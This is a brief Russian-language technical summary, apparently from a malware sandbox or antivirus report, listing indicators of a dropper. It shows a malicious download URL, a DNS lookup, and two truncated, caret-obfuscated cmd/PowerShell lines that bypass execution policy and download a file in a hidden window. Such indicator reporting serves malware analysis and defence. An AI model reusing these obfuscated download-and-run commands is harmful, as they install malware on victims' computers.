Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^we^rSHel^l^.^e^x^e -^e^XeCU^Ti^oN^p^OLIc^y bY^p^AsS -^NopR^o^FilE ^-w^i^NdOw^S^T^YLE Hi^dDE^N (^n^ew-oBjEcT^ s^YS^t^Em.^N^eT.^WEB^c^l^i^EnT).D^OW^n^LOa^dfi^l^E(^'http://zo...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "po^we^rSHel^l^.^e^x^e -^e^XeCU^Ti^oN^p^OLIc^y bY^p^AsS -^NopR^o^FilE ^-w^i^NdOw^S^T^YLE Hi^dDE^N (^n^ew-oBjEcT^ s^YS^t^Em.^N^eT.^WEB^c^l^i^EnT).D^OW^n^LOa^dfi^l^E(^'http://zo...' (со скрытым окном)